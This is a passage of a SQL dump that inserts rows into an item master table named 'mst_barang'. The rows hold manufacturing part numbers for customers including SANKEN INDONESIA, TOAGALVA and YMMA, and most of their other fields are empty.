INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0126', '11', '', 'APH44000-821', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0127', '11', '', 'APH44000-822', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0128', '11', '', 'APH44000-829', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0129', '11', '', 'APH44000-830-3A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0130', '11', '', 'APH44000-831-3A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0131', '11', '', 'APH44000-937', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0132', '11', '', 'APH44000-942-2', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0133', '11', '', 'APH44000-943-2', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0134', '11', '', 'APH44000-949-2', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0135', '11', '', 'APH44000-954-2', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0136', '11', '', 'APH44000-984BA', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0137', '11', '', 'APH44000-984WA', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0138', '11', '', 'APH44000-988-2', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0139', '11', '', 'APH44001-511-2B', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0140', '11', '', 'APH44001-512-2A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0141', '11', '', 'APH44001-516-2A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0142', '11', '', 'APH44001-517-2', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0143', '11', '', 'APH44001-521', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0144', '11', '', 'APH44001-528-3A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0145', '11', '', 'APH44001-535', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0146', '11', '', 'APH44001-536', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0147', '11', '', 'APH44001-540', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0148', '11', '', 'APH44001-544-2', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0149', '11', '', 'APH44001-545-2', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0150', '11', '', 'APH44001-546-2B', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0151', '11', '', 'APH44001-547-2', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0152', '11', '', 'APH44001-558-2', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0153', '11', '', 'APH44001-559', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0154', '11', '', 'APH44001-560-2', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0155', '11', '', 'APH44001-562', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0156', '11', '', 'APH44001-563', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0157', '11', '', 'APH44001-564', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0158', '11', '', 'APH44001-569-2', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0159', '11', '', 'APH44001-581-2A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0160', '11', '', 'APH44001-585-2', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0161', '11', '', 'APH44001-586-2', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0162', '11', '', 'APH44001-590-2', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0163', '11', '', 'APH44001-590-2 Export', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0164', '11', '', 'APH44001-595A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0165', '11', '', 'APH44001-595A Export', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0166', '11', '', 'APH44001-597A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0167', '11', '', 'APH44100-511A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0168', '11', '', 'APH44100-588', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0169', '11', '', 'APH44100-604B', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0170', '11', '', 'APH44100-632A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0171', '11', '', 'APH44100-638B', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0172', '11', '', 'APH44100-656D', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0173', '11', '', 'APH44100-657A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0174', '11', '', 'APH44100-730A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0175', '11', '', 'APH44100-742B', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0176', '11', '', 'APH44100-748B', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0177', '11', '', 'APH44100-751A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0178', '11', '', 'APH44100-767', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0179', '11', '', 'APH44100-773', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0180', '11', '', 'APH44100-774', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0181', '11', '', 'APH44100-775A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0182', '11', '', 'APH44100-775A Export', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0183', '11', '', 'APH44100-778A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0184', '11', '', 'APH44100-779C', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0185', '11', '', 'APH44200-536A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0186', '11', '', 'APH44200-537A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0187', '11', '', 'APH44200-588A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0188', '11', '', 'APH44200-589', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0189', '11', '', 'APH44200-594', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0190', '11', '', 'APH44200-601B', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0191', '11', '', 'APH44200-609', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0192', '11', '', 'APH44200-612', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0193', '11', '', 'APH44200-621', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0194', '11', '', 'APH44000-623', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0195', '11', '', 'APH44200-632A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0196', '11', '', 'APH44200-640', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0197', '11', '', 'APH44200-680', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0198', '11', '', 'APH44200-704', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0199', '11', '', 'APH44200-705', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0200', '11', '', 'APH44200-712', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0201', '11', '', 'APH44300-517/APH44300-517A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0202', '11', '', 'APH44400-599A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0203', '11', '', 'APH44400-603C', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0204', '11', '', 'APH44400-607A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0205', '11', '', 'APH44400-610', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0206', '11', '', 'APH44400-616-2', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0207', '11', '', 'APH44600-507A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0208', '11', '', 'APH46100-547', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0209', '11', '', 'APH46400-540', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0210', '11', '', 'APJ42200-508', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0211', '11', '', 'APJ43400-501B', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0212', '11', '', 'HAP33494-927C', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0213', '11', '', 'HAP33494-928C', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0214', '11', '', 'HAP33495-871A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0215', '11', '', 'HAP33495-872A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0216', '11', '', 'HAP33497-684A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0217', '11', '', 'HAP33497-685A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0218', '11', '', 'HAP33503-780', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0219', '11', '', 'HAP33503-781', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0220', '11', '', 'HAP33522-828', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0221', '11', '', 'HAP33522-829', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0222', '11', '', 'HAP43962-730-C', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0223', '11', '', 'HAP44029-942', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0224', '11', '', 'HAP33513-723A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0225', '11', '', 'OSH-1625-SPL', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0226', '11', '', 'OSH-1640-MP', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0227', '11', '', 'APH44001-503 2', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0228', '11', '', 'OSH-2428-SPL', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0229', '11', '', 'PC0615-53-PB', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0230', '11', '', 'PC1724B-40-PB/CX47100-144', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0231', '11', '', 'PUE16-25/OSH-1625-MP', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0232', '11', '', 'TR2215B', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0233', '11', '', 'TR3015B', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0234', '11', '', 'TR4515B', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0235', '11', '', 'APH34200-673A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0236', '11', '', 'APH44100-782A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0237', '11', '', 'APH44200-669', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0238', '11', '', 'APH44200-740', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0239', '11', '', 'APH44400-623', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0240', '11', '', 'APH46100-570', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0241', '11', '', 'APH44001-605-2 A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0242', '11', '', 'APH44200-738', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0243', '11', '', 'APH44200-739', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WSI-0244', '11', '', 'APH44400-621 A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN INDONESIA'); INSERT INTO mst_barang VALUES ('WTG-0001', '11', '', '501-07-024-70/CP187nobuffing', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'TOAGALVA'); INSERT INTO mst_barang VALUES ('WTG-0002', '11', '', '501-07-026-70/CP237', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'TOAGALVA'); INSERT INTO mst_barang VALUES ('WTG-0003', '11', '', '501-07-142-00/handlebracketMF', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'TOAGALVA'); INSERT INTO mst_barang VALUES ('WTG-0004', '11', '', '501-07-206-90/controlpanel', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'TOAGALVA'); INSERT INTO mst_barang VALUES ('WTG-0005', '11', '', '501-07-207-20/tunercase', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'TOAGALVA'); INSERT INTO mst_barang VALUES ('WTG-0006', '11', '', '501-07-208-70/tunercover', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'TOAGALVA'); INSERT INTO mst_barang VALUES ('WTG-0007', '11', '', '501-07-253-70/F1000WPWallBracket', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'TOAGALVA'); INSERT INTO mst_barang VALUES ('WTG-0008', '11', '', '501-07-254-40/F2000WPWallBracket', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'TOAGALVA'); INSERT INTO mst_barang VALUES ('WTG-0009', '11', '', '501-07-255-30/F1000WPSpeakerbracket', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'TOAGALVA'); INSERT INTO mst_barang VALUES ('WTG-0010', '11', '', '501-07-256-40/F2000WPSpeakerbracket', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'TOAGALVA'); INSERT INTO mst_barang VALUES ('WTG-0011', '11', '', '501-07-408-50/BS-1015BS', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'TOAGALVA'); INSERT INTO mst_barang VALUES ('WTG-0012', '11', '', '501-08-136-80/heatsink', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'TOAGALVA'); INSERT INTO mst_barang VALUES ('WTG-0013', '11', '', '501-27-196-50/handlebracketw/blk', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'TOAGALVA'); INSERT INTO mst_barang VALUES ('WTG-0014', '11', '', '501-27-365-70/PE-154BS', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'TOAGALVA'); INSERT INTO mst_barang VALUES ('WYA-0001', '11', '', 'V702680', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('WYA-0002', '11', '', 'V776520', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('WYA-0003', '11', '', 'V786660WA', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('WYA-0004', '11', '', 'WC40830 ', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('WYA-0005', '11', '', 'WC40830', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('WYA-0006', '11', '', 'WD18590 MODIF.', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('WYA-0007', '11', '', 'WD34730', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('WYA-0008', '11', '', 'WD94300A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('WYA-0009', '11', '', 'WE08730', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('WYA-0010', '11', '', 'WE08730 fin', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('WYA-0011', '11', '', 'WE15330/WG80390', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('WYA-0012', '11', '', 'WE15890/WG80380', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('WYA-0013', '11', '', 'WE15900/WG80370', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('WYA-0014', '11', '', 'WF54840', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('WYA-0015', '11', '', 'WF54850/WG80410', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('WYA-0016', '11', '', 'WG12050/WG80420', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('WYA-0017', '11', '', 'WG12060/WG80430', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('WYA-0018', '11', '', 'WG12070/WG80400', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('WYA-0019', '11', '', 'WG79990(Thern sheet only)', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('WYA-0020', '11', '', 'WG81820', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('WYA-0021', '11', '', 'WG98730BA', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('WYA-0022', '11', '', 'WG98730MF', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('WYA-0023', '11', '', 'WH00930', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('WYA-0024', '11', '', 'WH13020BA', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('WYA-0025', '11', '', 'WH13020MF', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('WYA-0026', '11', '', 'WH15130', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('WYA-0027', '11', '', 'WH15140', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('WYA-0028', '11', '', 'WH15150', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('WYA-0029', '11', '', 'WH45700', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('WYA-0030', '11', '', 'WJ14710', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('WYA-0031', '11', '', 'WJ14720', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('WYA-0032', '11', '', 'WJ16500', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('WYA-0033', '11', '', 'WJ17290', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('WYA-0034', '11', '', 'WJ45230', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('WYA-0035', '11', '', 'WJ91580', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('WYA-0036', '11', '', 'WJ94790BA', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('WYA-0037', '11', '', 'WJ94790MF', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('WYA-0038', '11', '', 'WK14070', '', '', '', null, null, null, null, null, null, '', 